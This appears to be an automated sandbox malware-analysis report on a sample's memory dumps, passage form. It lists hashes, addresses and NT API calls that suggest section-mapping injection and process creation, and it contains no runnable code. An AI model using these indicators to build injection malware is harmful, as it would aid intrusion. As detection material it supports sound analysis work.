Source File: 00000007.00000002.2344911963.0000000000510000.00000040.00000001.sdmp, Offset: 00510000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: 8e12f4b20edd14092c767837b0d6a63fc5fa59451e8ccbfbeb00165e0271d1df
Instruction ID: 40dcdb5aa0915df9a10cb9fec93806adaad395d20555d6b650150682f96b3637
Opcode Fuzzy Hash: 8e12f4b20edd14092c767837b0d6a63fc5fa59451e8ccbfbeb00165e0271d1df
Instruction Fuzzy Hash: 55F12F70518A8D8FDB65EF68C899AEEBBE1FB98304F40462AE44EC7251DF349941CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0051632E, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 226nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL ref: 00516413
NtMapViewOfSection.NTDLL ref: 0051647F
NtClose.NTDLL ref: 00516545

Strings

@, xrefs: 0051640B
@, xrefs: 0051648C

Memory Dump Source

Source File: 00000007.00000002.2344911963.0000000000510000.00000040.00000001.sdmp, Offset: 00510000, based on PE: false

Similarity

API ID: Section$CloseCreateView
String ID: @$@
API String ID: 1133238012-149943524
Opcode ID: 23bbd423bda2d343ab6e972927e2050342c0f7742b38ed2ef85d626af141b225
Instruction ID: c5668c478b525fdb4a42144534f97031ab3d40d22bd2e7daa83dfcc78db9004f
Opcode Fuzzy Hash: 23bbd423bda2d343ab6e972927e2050342c0f7742b38ed2ef85d626af141b225
Instruction Fuzzy Hash: 8761A37061CB098FDB58DF58D8856EABBE0FB98314F50062EE58AC3251DF75D481CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00516332, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON

Download Yara Rule

APIs

NtCreateSection.NTDLL ref: 00516413
NtMapViewOfSection.NTDLL ref: 0051647F

Strings

@, xrefs: 0051640B
@, xrefs: 0051648C

Memory Dump Source

Source File: 00000007.00000002.2344911963.0000000000510000.00000040.00000001.sdmp, Offset: 00510000, based on PE: false

Similarity

API ID: Section$CreateView
String ID: @$@
API String ID: 1585966358-149943524
Opcode ID: a1482434a0a88b71d013ed121938e84fd5f2c3cc8d37ffdd0bde3b1d9f6fd9a4
Instruction ID: 5fcec6b1d003729e7536279a3a2445c84b0660c086de02e1bc3c9940274ca814
Opcode Fuzzy Hash: a1482434a0a88b71d013ed121938e84fd5f2c3cc8d37ffdd0bde3b1d9f6fd9a4
Instruction Fuzzy Hash: AF517D7061CB098FD758DF18D8956AABBE0FB98304F50062EF98AC3651DF35D481CB86

Uniqueness

Uniqueness Score: -1.00%

Function 005167C2, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 0051691F

Strings

0, xrefs: 0051684D

Memory Dump Source

Source File: 00000007.00000002.2344911963.0000000000510000.00000040.00000001.sdmp, Offset: 00510000, based on PE: false

Similarity

API ID: InformationProcessQuery
String ID: 0
API String ID: 1778838933-4108050209
Opcode ID: ee058b3cccb49983a851c3df2d35334e30d543251d26de184eeff105f84e013e
Instruction ID: ef88fed699753a3d0a61c993d5fe5607f7cacb7ac88046949247fd72fbe6210f
Opcode Fuzzy Hash: ee058b3cccb49983a851c3df2d35334e30d543251d26de184eeff105f84e013e
Instruction Fuzzy Hash: 10512D70918A8D8FEB65EF68C8946EEBBF0FB98304F40462EA44ED7211DF349645CB41

Uniqueness

Uniqueness Score: -1.00%

Function 000981D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00093BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0009821D

Strings

.z`, xrefs: 0009820D, 00098218

Memory Dump Source

Source File: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 54f66134d72e5895203a74e1597a4b849c5be85c1124d214ac3a1456a0e4f0c0
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 87F0B2B2201208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 000982FB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(@=,?,?,00093D40,00000000,FFFFFFFF), ref: 00098325

Strings

@=, xrefs: 0009831C, 00098324

Memory Dump Source

Source File: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: @=
API String ID: 3535843008-2632950984
Opcode ID: 640b2d22ebdd2edf043d62f586b96de71a88c59a474137c0a22846fcfc88e603
Instruction ID: 83d00a2a061f43350ad65ffd69678db64dd240c79552d3e9357b5a86357148dd
Opcode Fuzzy Hash: 640b2d22ebdd2edf043d62f586b96de71a88c59a474137c0a22846fcfc88e603
Instruction Fuzzy Hash: F5F05EB6200118ABDB14EF98DC80EEB7769EF88310F148559BA1C9B282C630E91587E0

Uniqueness

Uniqueness Score: -1.00%

Function 00098280, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,!:,FFFFFFFF,?,b=,?,00000000), ref: 000982C5

Strings

!:, xrefs: 0009829C, 000982A8

Memory Dump Source

Source File: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID: !:
API String ID: 2738559852-2595984152
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: e8a0500a2ac4b7a84fe9f6416392c8ffd6bfa165503efab50eac44a2dfd3a6b5
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 46F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158248BA1D97241DA30E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00098300, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(@=,?,?,00093D40,00000000,FFFFFFFF), ref: 00098325

Strings

@=, xrefs: 0009831C, 00098324

Memory Dump Source

Source File: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Close
String ID: @=
API String ID: 3535843008-2632950984
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: d3195b798101d0e5feaa660c62fabe49bed0d5a9fb5cae54d3c1cf7ac1affaff
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 7AD012752002146BD710EF98CC45ED7775CEF44750F154455BA189B282C570F90087E0

Uniqueness

Uniqueness Score: -1.00%

Function 023A00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 023A00CF

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846

Uniqueness

Uniqueness Score: -1.00%

Function 023A07AC, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 023A07B7

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487

Uniqueness

Uniqueness Score: -1.00%

Function 0239FAE8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0239FAF3

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456

Uniqueness

Uniqueness Score: -1.00%

Function 0239FB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0239FB73

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 0239FB50, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0239FB5B

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447

Uniqueness

Uniqueness Score: -1.00%

Function 0239FBB8, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0239FBC3

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 0239F900, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0239F90E

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587

Uniqueness

Uniqueness Score: -1.00%

Function 0239F9F0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0239F9FB

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A

Uniqueness

Uniqueness Score: -1.00%

Function 0239FED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0239FEDB

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 0239FFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0239FFBF

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 0239FC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0239FC6B

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 0239FD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0239FD9A

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 0239FDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0239FDCB

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 000984D2, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90processmemoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 0009850D
CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000985A4

Strings

.z`, xrefs: 000984FC, 00098508
&5, xrefs: 000984C2, 000984CC

Memory Dump Source

Source File: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateFreeHeapInternalProcess
String ID: &5$.z`
API String ID: 1438695366-3980887056
Opcode ID: 8a0a05a210d0931acb3187657e80cf88f67b11d5a12832665b1003238f7b63d2
Instruction ID: 63135bd13252b6f24590c39e42ab8d7ca56ee87bdb57c4f8e350aaa925697651
Opcode Fuzzy Hash: 8a0a05a210d0931acb3187657e80cf88f67b11d5a12832665b1003238f7b63d2
Instruction Fuzzy Hash: AE214DB1205205BBCB14DF99CC80EE777ADAF89310F158659FA0997242C630E815CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00096EF0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00096F98

Strings

wininet.dll, xrefs: 00096F4E, 00096F57
net.dll, xrefs: 00096F61, 00096FE7, 00096FBF, 00096FCB, 00096FF3

Memory Dump Source

Source File: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 8a0873586111ec8251bd71e041c8acb0ff5d289d788fb4831f81eb846351cb3f
Instruction ID: c71ef4f9991e5e487f443323638a774547d7c53b952bdd00561742697391ac3d
Opcode Fuzzy Hash: 8a0873586111ec8251bd71e041c8acb0ff5d289d788fb4831f81eb846351cb3f
Instruction Fuzzy Hash: F83192B2601704ABCB25DF68DCA1FA7B7F8BB88700F00842DF61A5B242D730B545DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00096EE7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 00096F98

Strings

wininet.dll, xrefs: 00096F4E, 00096F57
net.dll, xrefs: 00096F61, 00096FBF, 00096FCB

Memory Dump Source

Source File: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: b480fbe44f48291bdd4a5e3cf0e88e7e89706e97033e7c7acf7961a617f0a6ae
Instruction ID: 4fcb5d821aaad81bd601227fdfb7d7c3cda286df4bdf3232f551fc30efcc7411
Opcode Fuzzy Hash: b480fbe44f48291bdd4a5e3cf0e88e7e89706e97033e7c7acf7961a617f0a6ae
Instruction Fuzzy Hash: CF31A5B1505704AFCB15DF54D8A1FABB7F4FB48700F04802DF6195B242D771A845DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 000984E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083B93), ref: 0009850D

Strings

.z`, xrefs: 000984FC, 00098508

Memory Dump Source

Source File: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: bcf903c7991c295c04e1ffd94516c1785eeebb9a2bad9424d7e0369f9934967b
